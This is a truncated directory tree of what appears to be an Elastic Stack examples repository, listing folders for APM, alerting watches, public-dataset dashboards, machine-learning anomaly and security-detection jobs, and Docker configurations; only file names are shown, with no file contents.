The response has been limited to 50k tokens of the smallest files in the repo. You can remove this limitation by removing the max tokens filter.
├── .gitattributes
├── .gitignore
├── APM
    └── Node.js
    │   └── Kubernetes
    │       ├── .dockerignore
    │       ├── .gitignore
    │       ├── Dockerfile
    │       ├── ELASTIC_APM_SECRET_TOKEN
    │       ├── ELASTIC_APM_SERVER_URL
    │       ├── ELASTIC_APM_SERVICE_NAME
    │       ├── README.md
    │       ├── images
    │           ├── APM-1.png
    │           ├── APM-2.png
    │           ├── APM-3.png
    │           ├── APM-4.png
    │           ├── APM-5.png
    │           ├── Node-1.png
    │           └── Node-2.png
    │       ├── namespace.yaml
    │       ├── node-express.yaml
    │       ├── package.json
    │       └── server.js
├── Alerting
    ├── Sample Watches
    │   ├── .gitignore
    │   ├── README.md
    │   ├── cpu_iowait_hosts
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── calculate_iowait.json
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── errors_in_logs
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── filesystem_usage
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── large_shard_watch
    │   │   ├── README.md
    │   │   └── watch.json
    │   ├── lateral_movement_in_user_comm
    │   │   ├── README.md
    │   │   ├── ingest.json
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   ├── lower_time.json
    │   │   │   ├── transform.json
    │   │   │   └── upper_time.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── load_watch.sh
    │   ├── ml_examples
    │   │   ├── README.md
    │   │   ├── bucket_record_chain_watch.json
    │   │   ├── bucket_watch.json
    │   │   ├── chained_watch.json
    │   │   ├── default_ml_watch.json
    │   │   ├── default_ml_watch_email.json
    │   │   └── multiple_jobs_watch.json
    │   ├── monitoring_cluster_health
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── monitoring_free_disk_space
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── new_process_started
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── port_scan
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   ├── index_transform.json
    │   │   │   └── log_transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── requirements.txt
    │   ├── run_all_tests.sh
    │   ├── run_test.py
    │   ├── run_test.sh
    │   ├── system_fails_to_provide_data
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   ├── condition.json
    │   │   │   └── transform.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   ├── twitter_trends
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │   │   └── condition.json
    │   │   ├── tests
    │   │   │   └── test1.json
    │   │   └── watch.json
    │   └── unexpected_account_activity
    │   │   ├── README.md
    │   │   ├── mapping.json
    │   │   ├── scripts
    │   │       ├── condition.json
    │   │       └── transform.json
    │   │   ├── tests
    │   │       └── test1.json
    │   │   └── watch.json
    └── watcher_dashboard
    │   ├── README.md
    │   └── watch_history_dashboard.json
├── CONTRIBUTING.md
├── Cloud Enterprise
    └── Getting Started Examples
    │   ├── aws
    │       └── terraform
    │       │   ├── .gitignore
    │       │   ├── README.md
    │       │   ├── ansible-install.sh
    │       │   ├── main.tf
    │       │   ├── networking.tf
    │       │   ├── provider.tf
    │       │   ├── servers.tf
    │       │   ├── terraform.tfvars.example
    │       │   └── variables.tf
    │   └── gcp
    │       └── terraform
    │           ├── .gitignore
    │           ├── README.md
    │           ├── ansible-install.sh
    │           ├── main.tf
    │           ├── networking.tf
    │           ├── provider.tf
    │           ├── servers.tf
    │           ├── terraform.tfvars.example
    │           └── variables.tf
├── Common Data Formats
    ├── apache_logs
    │   ├── README.md
    │   ├── apache_dashboard.jpg
    │   ├── apache_logs
    │   └── logstash
    │   │   ├── apache_kibana-4.json
    │   │   ├── apache_kibana.json
    │   │   ├── apache_logstash.conf
    │   │   └── apache_template.json
    ├── cef
    │   ├── README.md
    │   ├── cef_dashboard.png
    │   ├── dashboard.json
    │   ├── docker-compose.yml
    │   └── logstash
    │   │   ├── Dockerfile
    │   │   └── pipeline
    │   │       ├── cef_template.json
    │   │       └── logstash.conf
    ├── nginx_json_logs
    │   ├── README.md
    │   ├── logstash
    │   │   └── nginx_json_logstash.conf
    │   ├── nginx_json_dashboard.jpg
    │   ├── nginx_json_filebeat.yml
    │   ├── nginx_json_kibana.json
    │   ├── nginx_json_logs
    │   └── nginx_json_template.json
    ├── nginx_json_plus_logs
    │   ├── README.md
    │   ├── logstash
    │   │   └── nginxplus_json_logstash.conf
    │   ├── nginx_plus_json_dashboard.jpg
    │   ├── nginxplus_elastic_fields
    │   ├── nginxplus_filebeat.yml
    │   ├── nginxplus_json_kibana.json
    │   ├── nginxplus_json_logs
    │   └── nginxplus_json_pipeline.json
    ├── nginx_logs
    │   ├── README.md
    │   ├── logstash
    │   │   ├── nginx_kibana.json
    │   │   ├── nginx_logstash.conf
    │   │   └── nginx_template.json
    │   ├── nginx_dashboard.jpg
    │   └── nginx_logs
    └── twitter
    │   ├── README.md
    │   ├── twitter_dashboard.jpg
    │   ├── twitter_kibana.json
    │   ├── twitter_logstash.conf
    │   └── twitter_template.json
├── Exploring Public Datasets
    ├── cdc_nutrition_exercise_patterns
    │   ├── README.md
    │   ├── brfss_kibana_dashboard.json
    │   ├── kibana_exercise_dashboard.jpg
    │   ├── kibana_nutrition_dashboard.jpg
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── State.csv
    │   │   ├── activity.csv
    │   │   ├── brfss_mapping.json
    │   │   ├── process_brfss_data.ipynb
    │   │   ├── process_brfss_data.py
    │   │   ├── requirements.txt
    │   │   └── variable_list.csv
    ├── donorschoose
    │   ├── README.md
    │   ├── donorschoose_dashboard.jpg
    │   ├── donorschoose_dashboard.json
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── donorschoose_mapping.json
    │   │   ├── donorschoose_process_data.ipynb
    │   │   ├── donorschoose_process_data.py
    │   │   └── requirements.txt
    ├── earthquakes
    │   ├── README.md
    │   ├── ncedc-earthquakes-dashboards.json
    │   ├── ncedc-earthquakes-dataset.tar.gz
    │   ├── ncedc-earthquakes-filebeat.yml
    │   ├── ncedc-earthquakes-logstash.conf
    │   ├── ncedc-earthquakes-pipeline.json
    │   ├── ncedc-earthquakes-screenshot.png
    │   └── ncedc-earthquakes-template.json
    ├── nhl
    │   ├── README.md
    │   ├── against.png
    │   ├── clean.sh
    │   ├── dashboards.json
    │   ├── game.png
    │   ├── geo-arena
    │   │   ├── README.md
    │   │   ├── arena-viz.png
    │   │   ├── arena.tiff
    │   │   └── kibana-settings.png
    │   ├── go.js
    │   └── package.json
    ├── nyc_restaurants
    │   ├── README.md
    │   ├── restaurants_kibana.jpg
    │   ├── restaurants_kibana.json
    │   └── scripts
    │   │   ├── README.md
    │   │   ├── ingestRestaurantData.ipynb
    │   │   ├── ingestRestaurantData.py
    │   │   ├── inspection_mapping.json
    │   │   └── requirements.txt
    ├── nyc_traffic_accidents
    │   ├── README.md
    │   ├── nyc_collision_filebeat.yml
    │   ├── nyc_collision_kibana.json
    │   ├── nyc_collision_logstash.conf
    │   ├── nyc_collision_pipeline.json
    │   └── nyc_collision_template.json
    └── usfec
    │   ├── README.md
    │   ├── scripts
    │       ├── README.md
    │       ├── US.txt
    │       ├── usfec_logstash.conf
    │       ├── usfec_process_data.py
    │       ├── usfec_template.json
    │       └── zip_codes.csv
    │   ├── usfec_dashboard.jpg
    │   └── usfec_kibana.json
├── GCP Dataflow to Elasticsearch
    ├── .gitignore
    ├── .tool-versions
    ├── README.md
    ├── audit.tf
    ├── main.tf
    └── vars.tf
├── GKE-On-Prem
    ├── README.md
    ├── elasticsearch-hosts-ports
    ├── filebeat-kubernetes.yaml
    ├── filebeat-setup.yaml
    ├── guestbook.yaml
    ├── journalbeat-kubernetes.yaml
    ├── kibana-host-port
    ├── metricbeat-kubernetes.yaml
    └── metricbeat-setup.yaml
├── Graph
    ├── apache_logs_security_analysis
    │   ├── README.md
    │   ├── download_data.py
    │   ├── filebeat_secrepo.yml
    │   ├── logstash
    │   │   ├── patterns
    │   │   │   └── custom
    │   │   └── secrepo_logstash.conf
    │   ├── requirements.txt
    │   ├── secrepo.json
    │   ├── secrepo_graph.jpg
    │   └── secrepo_pipeline.json
    └── movie_recommendations
    │   ├── README.md
    │   ├── download_data.py
    │   ├── index_ratings.py
    │   ├── index_users.py
    │   ├── movie_lens.json
    │   ├── movie_lens_date_clustering.jpg
    │   ├── movie_lens_example_graph.jpg
    │   ├── movie_lens_total_reviews_by_date.png
    │   └── requirements.txt
├── Installation and Setup.md
├── LICENSE
├── Machine Learning
    ├── Analytics Jupyter Notebooks
    │   ├── README.md
    │   ├── ml-analytics-classification-requirements.txt
    │   └── ml-analytics-classification.ipynb
    ├── Anomaly Detection
    │   ├── README.md
    │   ├── apm_jsbase
    │   │   ├── README.md
    │   │   ├── abnormal_span_durations_jsbase.json
    │   │   ├── anomalous_error_rate_for_user_agents_jsbase.json
    │   │   ├── decreased_throughput_jsbase.json
    │   │   └── high_count_by_user_agent_jsbase.json
    │   ├── apm_nodejs
    │   │   ├── README.md
    │   │   ├── abnormal_span_durations_nodejs.json
    │   │   ├── abnormal_trace_durations_nodejs.json
    │   │   └── decreased_throughput_nodejs.json
    │   ├── security_linux
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_v2_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── datafeed_v2_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_v2_linux_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_v2_linux_rare_metadata_process.json
    │   │   │   ├── datafeed_v2_linux_rare_metadata_user.json
    │   │   │   ├── datafeed_v2_rare_process_by_host_linux_ecs.json
    │   │   │   ├── v2_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── v2_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── v2_linux_anomalous_user_name_ecs.json
    │   │   │   ├── v2_linux_rare_metadata_process.json
    │   │   │   ├── v2_linux_rare_metadata_user.json
    │   │   │   └── v2_rare_process_by_host_linux_ecs.json
    │   ├── security_windows
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_v2_rare_process_by_host_windows_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_v2_windows_anomalous_process_creation.json
    │   │   │   ├── datafeed_v2_windows_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_v2_windows_rare_metadata_process.json
    │   │   │   ├── datafeed_v2_windows_rare_metadata_user.json
    │   │   │   ├── v2_rare_process_by_host_windows_ecs.json
    │   │   │   ├── v2_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── v2_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── v2_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── v2_windows_anomalous_process_creation.json
    │   │   │   ├── v2_windows_anomalous_user_name_ecs.json
    │   │   │   ├── v2_windows_rare_metadata_process.json
    │   │   │   └── v2_windows_rare_metadata_user.json
    │   ├── siem_auditbeat
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_linux_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_network_service.json
    │   │   │   ├── datafeed_linux_anomalous_network_url_activity_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_linux_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_linux_network_configuration_discovery.json
    │   │   │   ├── datafeed_linux_network_connection_discovery.json
    │   │   │   ├── datafeed_linux_rare_kernel_module_arguments.json
    │   │   │   ├── datafeed_linux_rare_metadata_process.json
    │   │   │   ├── datafeed_linux_rare_metadata_user.json
    │   │   │   ├── datafeed_linux_rare_sudo_user.json
    │   │   │   ├── datafeed_linux_rare_user_compiler.json
    │   │   │   ├── datafeed_linux_system_information_discovery.json
    │   │   │   ├── datafeed_linux_system_process_discovery.json
    │   │   │   ├── datafeed_linux_system_user_discovery.json
    │   │   │   ├── datafeed_rare_process_by_host_linux_ecs.json
    │   │   │   ├── linux_anomalous_network_activity_ecs.json
    │   │   │   ├── linux_anomalous_network_port_activity_ecs.json
    │   │   │   ├── linux_anomalous_network_service.json
    │   │   │   ├── linux_anomalous_network_url_activity_ecs.json
    │   │   │   ├── linux_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── linux_anomalous_user_name_ecs.json
    │   │   │   ├── linux_network_configuration_discovery.json
    │   │   │   ├── linux_network_connection_discovery.json
    │   │   │   ├── linux_rare_kernel_module_arguments.json
    │   │   │   ├── linux_rare_metadata_process.json
    │   │   │   ├── linux_rare_metadata_user.json
    │   │   │   ├── linux_rare_sudo_user.json
    │   │   │   ├── linux_rare_user_compiler.json
    │   │   │   ├── linux_system_information_discovery.json
    │   │   │   ├── linux_system_process_discovery.json
    │   │   │   ├── linux_system_user_discovery.json
    │   │   │   └── rare_process_by_host_linux_ecs.json
    │   ├── siem_auditbeat_auth
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_suspicious_login_activity_ecs.json
    │   │   │   └── suspicious_login_activity_ecs.json
    │   ├── siem_winlogbeat
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │   │   ├── datafeed_rare_process_by_host_windows_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_network_activity_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_path_activity_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── datafeed_windows_anomalous_process_creation.json
    │   │   │   ├── datafeed_windows_anomalous_script.json
    │   │   │   ├── datafeed_windows_anomalous_service.json
    │   │   │   ├── datafeed_windows_anomalous_user_name_ecs.json
    │   │   │   ├── datafeed_windows_rare_metadata_process.json
    │   │   │   ├── datafeed_windows_rare_metadata_user.json
    │   │   │   ├── datafeed_windows_rare_user_runas_event.json
    │   │   │   ├── rare_process_by_host_windows_ecs.json
    │   │   │   ├── windows_anomalous_network_activity_ecs.json
    │   │   │   ├── windows_anomalous_path_activity_ecs.json
    │   │   │   ├── windows_anomalous_process_all_hosts_ecs.json
    │   │   │   ├── windows_anomalous_process_creation.json
    │   │   │   ├── windows_anomalous_script.json
    │   │   │   ├── windows_anomalous_service.json
    │   │   │   ├── windows_anomalous_user_name_ecs.json
    │   │   │   ├── windows_rare_metadata_process.json
    │   │   │   ├── windows_rare_metadata_user.json
    │   │   │   └── windows_rare_user_runas_event.json
    │   └── siem_winlogbeat_auth
    │   │   ├── logo.json
    │   │   ├── manifest.json
    │   │   └── ml
    │   │       ├── datafeed_windows_rare_user_type10_remote_login.json
    │   │       └── windows_rare_user_type10_remote_login.json
    ├── Business Metrics Recipes
    │   ├── README.md
    │   ├── scripts
    │   │   └── reset_job.sh
    │   └── twitter_trends
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       ├── filebeat
    │   │       │   └── filebeat.yml
    │   │       ├── logstash
    │   │       │   └── logstash.conf
    │   │       └── templates
    │   │       │   └── twitter.json
    │   │   ├── data
    │   │       └── tweets.csv
    │   │   └── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    ├── Class Assigment Objectives
    │   ├── README.md
    │   ├── classification-class-assignment-objective.ipynb
    │   └── requirements.txt
    ├── DGA Detection
    │   ├── README.md
    │   ├── detecting-dga-activity-in-network-data.md
    │   ├── ngram-extractor-reindex.json
    │   └── training-supervised-models-to-detect-dga-activity.md
    ├── Data Frames
    │   ├── anonreviews.csv.bz2
    │   ├── pivot_review_data_elastic.ipynb
    │   └── pivot_review_data_pandas.ipynb
    ├── Feature Importance
    │   ├── README.md
    │   ├── feature_importance_in_elasticsearch.ipynb
    │   └── requirements.txt
    ├── Getting Started Examples
    │   ├── README.md
    │   ├── server_metrics
    │   │   ├── README.md
    │   │   ├── ingest-data.sh
    │   │   └── kibana-dashboard.json
    │   └── user_activity
    │   │   ├── README.md
    │   │   └── ingest-data.sh
    ├── IT Operations Recipes
    │   ├── README.md
    │   ├── scripts
    │   │   └── reset_job.sh
    │   ├── service_response_change
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── filebeat
    │   │   │   │   └── default.json
    │   │   ├── data
    │   │   │   └── apache_logs.log
    │   │   └── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   ├── job.json
    │   │   │   └── reset_job.sh
    │   └── system_metric_change
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       ├── ingest
    │   │       │   └── core_id.json
    │   │       └── metricbeat
    │   │       │   └── metricbeat.yml
    │   │   └── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    ├── Online Search Relevance Metrics
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.md
    │   ├── bin
    │   │   ├── complete
    │   │   ├── index
    │   │   ├── kibana
    │   │   ├── prepare
    │   │   └── simulate
    │   ├── config
    │   │   ├── ecs
    │   │   │   ├── custom
    │   │   │   │   ├── search_metrics.yml
    │   │   │   │   └── search_metrics_simulation.yml
    │   │   │   └── subset.yml
    │   │   ├── indices
    │   │   │   ├── ecs-search-metrics.json
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   └── ecs-search-metrics_transform_queryid.json
    │   │   ├── kibana
    │   │   │   └── dashboard.json
    │   │   ├── pipelines
    │   │   │   ├── ecs-search-metrics.json
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   ├── ecs-search-metrics_transform_queryid.json
    │   │   │   ├── sc-click-events.json
    │   │   │   └── sc-query-events.json
    │   │   └── transforms
    │   │   │   ├── ecs-search-metrics_transform_completion.json
    │   │   │   └── ecs-search-metrics_transform_queryid.json
    │   ├── metrics
    │   │   ├── __init__.py
    │   │   ├── resources.py
    │   │   └── simulate.py
    │   ├── notebooks
    │   │   └── Metrics with eland.ipynb
    │   ├── requirements.txt
    │   ├── setup.py
    │   └── tests
    │   │   ├── __init__.py
    │   │   ├── integration
    │   │       ├── __init__.py
    │   │       └── test_integration.py
    │   │   └── unit
    │   │       ├── __init__.py
    │   │       └── test_simulate.py
    ├── Outlier Detection
    │   ├── Introduction
    │   │   ├── README.md
    │   │   ├── advent-outliers.ipynb
    │   │   └── requirements.txt
    │   └── README.md
    ├── ProblemChild
    │   ├── README.md
    │   ├── blocklist.json
    │   ├── blocklist_keywords.txt
    │   ├── datafeeds
    │   │   ├── datafeed-experimental-high-sum-by-host-problemchild.json
    │   │   ├── datafeed-experimental-high-sum-by-parent-problemchild.json
    │   │   ├── datafeed-experimental-high-sum-by-user-problemchild.json
    │   │   ├── datafeed-experimental-rare-process--by-parent-problemchild.json
    │   │   ├── datafeed-experimental-rare-process-by-host-problemchild.json
    │   │   └── datafeed-experimental-rare-process-by-user-problemchild.json
    │   ├── features.json
    │   ├── job_configs
    │   │   ├── experimental-high-sum-by-host-problemchild.json
    │   │   ├── experimental-high-sum-by-parent-problemchild.json
    │   │   ├── experimental-high-sum-by-user-problemchild.json
    │   │   ├── experimental-rare-process-by-host-problemchild.json
    │   │   ├── experimental-rare-process-by-parent-problemchild.json
    │   │   └── experimental-rare-process-by-user-problemchild.json
    │   ├── ngram_extractor.json
    │   ├── normalize_ppath.json
    │   ├── problemchild-end-to-end.md
    │   ├── problemchild_features.json
    │   └── problemchild_inference.json
    ├── Query Optimization
    │   ├── .gitignore
    │   ├── Makefile
    │   ├── README.md
    │   ├── bin
    │   │   ├── bulk-index
    │   │   ├── bulk-search
    │   │   ├── convert-msmarco-document-corpus
    │   │   ├── eval
    │   │   ├── optimize-query
    │   │   └── split-and-sample
    │   ├── config
    │   │   ├── metric-mrr-100.json
    │   │   ├── msmarco-document-index.custom.json
    │   │   ├── msmarco-document-index.defaults.json
    │   │   ├── msmarco-document-index.doc2query.json
    │   │   ├── msmarco-document-templates.doc2query.json
    │   │   ├── msmarco-document-templates.json
    │   │   ├── optimize-query.best_fields.json
    │   │   ├── optimize-query.cross_fields.json
    │   │   ├── params.best_fields.baseline.json
    │   │   └── params.cross_fields.baseline.json
    │   ├── notebooks
    │   │   ├── 0 - Analyzers.ipynb
    │   │   ├── 1 - Query tuning.ipynb
    │   │   ├── 2 - Query tuning - best_fields.ipynb
    │   │   ├── Appendix A - BM25 tuning.ipynb
    │   │   ├── Appendix B - Combining queries.ipynb
    │   │   ├── Appendix C - most_fields.ipynb
    │   │   ├── Appendix.ipynb
    │   │   ├── doc2query - 1 - BM25 tuning.ipynb
    │   │   ├── doc2query - 2 - best_fields.ipynb
    │   │   ├── doc2query - 3 - most_fields.ipynb
    │   │   └── doc2query - 4 - linear combo.ipynb
    │   ├── qopt
    │   │   ├── __init__.py
    │   │   ├── eval.py
    │   │   ├── notebooks.py
    │   │   ├── optimize.py
    │   │   ├── search.py
    │   │   ├── trec.py
    │   │   └── util.py
    │   ├── requirements.txt
    │   ├── submissions
    │   │   ├── 20201125-elastic-optimized_best_fields
    │   │   │   ├── metadata.json
    │   │   │   └── params.json
    │   │   └── 20210120-elastic-doc2query_optimized_most_fields
    │   │   │   ├── metadata.json
    │   │   │   └── params.json
    │   └── tests
    │   │   ├── __init__.py
    │   │   └── test_optimize.py
    ├── README.md
    ├── Regression Loss Functions
    │   ├── README.md
    │   ├── regression-loss-functions.ipynb
    │   └── requirements.txt
    ├── Security Analytics Recipes
    │   ├── README.md
    │   ├── dns_data_exfiltration
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── TODO
    │   │   ├── configs
    │   │   │   ├── ingest
    │   │   │   │   └── extract_subdomain.json
    │   │   │   └── packetbeat
    │   │   │   │   └── packetbeat.yml
    │   │   ├── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   │   └── scripts
    │   │   │   ├── dns_exfil_random.sh
    │   │   │   └── dns_exfil_random_osx.sh
    │   ├── http_data_exfiltration
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── packetbeat
    │   │   │   │   └── packetbeat.yml
    │   │   ├── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   │   └── scripts
    │   │   │   ├── client.sh
    │   │   │   └── server.sh
    │   ├── scripts
    │   │   └── reset_job.sh
    │   ├── suspicious_login_activity
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │   │   └── filebeat
    │   │   │   │   └── filebeat.yml
    │   │   ├── data
    │   │   │   └── auth.log
    │   │   └── machine_learning
    │   │   │   ├── data_feed.json
    │   │   │   └── job.json
    │   └── suspicious_process_activity
    │   │   ├── EXAMPLE.md
    │   │   ├── README.md
    │   │   ├── configs
    │   │       └── filebeat
    │   │       │   └── filebeat.yml
    │   │   ├── machine_learning
    │   │       ├── data_feed.json
    │   │       └── job.json
    │   │   └── scripts
    │   │       └── start_random_process.sh
    └── Transforms
    │   └── super-alerts package
├── Maps
    └── Getting Started Examples
    │   └── geojson_upload_and_styling
    │       ├── bangor_international_airport.geojson
    │       ├── lightning_detected.geojson
    │       ├── logan_international_airport.geojson
    │       ├── modified_flight_path.geojson
    │       └── original_flight_path.geojson
├── Miscellaneous
    ├── custom_tile_maps
    │   ├── README.md
    │   ├── __init__.py
    │   ├── elastic{ON}_full_floor_plan.pdf
    │   ├── elastic{ON}_simplified.svg
    │   ├── generate_random_data.py
    │   ├── requirements.txt
    │   ├── shape_files
    │   │   ├── demo_booths.dbf
    │   │   ├── demo_booths.prj
    │   │   ├── demo_booths.qix
    │   │   ├── demo_booths.qpj
    │   │   ├── demo_booths.shp
    │   │   ├── demo_booths.shx
    │   │   ├── demo_stands.dbf
    │   │   ├── demo_stands.prj
    │   │   ├── demo_stands.qix
    │   │   ├── demo_stands.qpj
    │   │   ├── demo_stands.shp
    │   │   ├── demo_stands.shx
    │   │   ├── inner_wall.dbf
    │   │   ├── inner_wall.prj
    │   │   ├── inner_wall.qix
    │   │   ├── inner_wall.qpj
    │   │   ├── inner_wall.shp
    │   │   ├── inner_wall.shx
    │   │   ├── outer_wall.dbf
    │   │   ├── outer_wall.prj
    │   │   ├── outer_wall.qix
    │   │   ├── outer_wall.qpj
    │   │   ├── outer_wall.shp
    │   │   └── outer_wall.shx
    │   └── styles
    │   │   ├── demo_booths.xml
    │   │   ├── demo_stands.xml
    │   │   ├── inner_walls.xml
    │   │   └── outer_walls.xml
    ├── docker
    │   ├── CHANGES.md
    │   ├── README.md
    │   ├── create_packages.sh
    │   └── full_stack_example
    │   │   ├── .env
    │   │   ├── .kitchen
    │   │       └── logs
    │   │       │   └── kitchen.log
    │   │   ├── README.md
    │   │   ├── config
    │   │       ├── apache2
    │   │       │   ├── Dockerfile
    │   │       │   └── httpd.conf
    │   │       ├── beats
    │   │       │   ├── filebeat
    │   │       │   │   ├── filebeat.yml
    │   │       │   │   └── prospectors.d
    │   │       │   │   │   └── docker.yml
    │   │       │   ├── heartbeat
    │   │       │   │   └── heartbeat.yml
    │   │       │   ├── metricbeat
    │   │       │   │   ├── metricbeat.yml
    │   │       │   │   └── modules.d
    │   │       │   │   │   ├── apache.yml
    │   │       │   │   │   ├── docker.yml
    │   │       │   │   │   ├── mysql.yml
    │   │       │   │   │   ├── nginx.yml
    │   │       │   │   │   └── system.yml
    │   │       │   └── packetbeat
    │   │       │   │   └── packetbeat.yml
    │   │       ├── elasticsearch
    │   │       │   └── elasticsearch.yml
    │   │       ├── kibana
    │   │       │   └── kibana.yml
    │   │       ├── mysql
    │   │       │   ├── Dockerfile
    │   │       │   └── conf-file.cnf
    │   │       └── nginx
    │   │       │   ├── Dockerfile
    │   │       │   └── nginx.conf
    │   │   ├── docker-compose-linux.yml
    │   │   ├── docker-compose-osx.yml
    │   │   ├── docker-compose-windows.yml
    │   │   ├── full_stack_example.tar.gz
    │   │   ├── full_stack_example.zip
    │   │   └── init
    │   │       ├── configure-stack.sh
    │   │       ├── pipelines
    │   │           └── docker-logs.json
    │   │       └── templates
    │   │           └── docker-logs.json
    ├── gdpr
    │   └── pseudonymization
    │   │   ├── Dockerfile
    │   │   ├── README.md
    │   │   ├── docker-compose.yml
    │   │   ├── logstash_fingerprint.conf
    │   │   ├── logstash_script_fingerprint.conf
    │   │   ├── pipelines.yml
    │   │   ├── pseudonymise.rb
    │   │   └── sample_docs
    ├── kafka_logstash
    │   ├── README
    │   ├── gc.conf
    │   └── grok-custom-patterns
    ├── kafka_monitoring
    │   ├── README.md
    │   └── filebeat_monitoring
    │   │   ├── README.md
    │   │   ├── es
    │   │       ├── fb-kafka.template.json
    │   │       ├── kafka-gc-logs.json
    │   │       └── kafka-logs.json
    │   │   ├── es_stack
    │   │       └── docker-compose.yml
    │   │   ├── filebeat.yml
    │   │   ├── kibana
    │   │       ├── dashboard
    │   │       │   ├── Kafka-GC-Logs.json
    │   │       │   └── Kafka-Logs.json
    │   │       ├── search
    │   │       │   ├── Kafka-Logs-Stack-Traces.json
    │   │       │   └── Kafka-Logs-Table.json
    │   │       └── visualization
    │   │       │   ├── Kafka-GC-Eden-Delta-Total.json
    │   │       │   ├── Kafka-GC-Eden-Delta-Used.json
    │   │       │   ├── Kafka-GC-Heap-Delta.json
    │   │       │   ├── Kafka-GC-Pauses.json
    │   │       │   ├── Kafka-GC-Survivors-Delta.json
    │   │       │   ├── Kafka-Log-Count-Stacktraces-Components.json
    │   │       │   ├── Kafka-Log-Count-Stacktraces-Nodes.json
    │   │       │   └── Kafka-Logs-Count.json
    │   │   └── logs
    │   │       ├── kafka0
    │   │           └── logs
    │   │           │   ├── controller.log
    │   │           │   ├── controller.log.2016-12-19-16
    │   │           │   ├── controller.log.2016-12-19-17
    │   │           │   ├── controller.log.2016-12-19-18
    │   │           │   ├── controller.log.2016-12-19-19
    │   │           │   ├── controller.log.2016-12-19-20
    │   │           │   ├── controller.log.2016-12-19-21
    │   │           │   ├── controller.log.2016-12-19-22
    │   │           │   ├── controller.log.2016-12-19-23
    │   │           │   ├── kafka-authorizer.log
    │   │           │   ├── kafka-request.log
    │   │           │   ├── kafkaServer-gc.log
    │   │           │   ├── log-cleaner.log
    │   │           │   ├── log-cleaner.log.2016-12-19-16
    │   │           │   ├── server.log
    │   │           │   ├── server.log.2016-12-19-16
    │   │           │   ├── server.log.2016-12-19-17
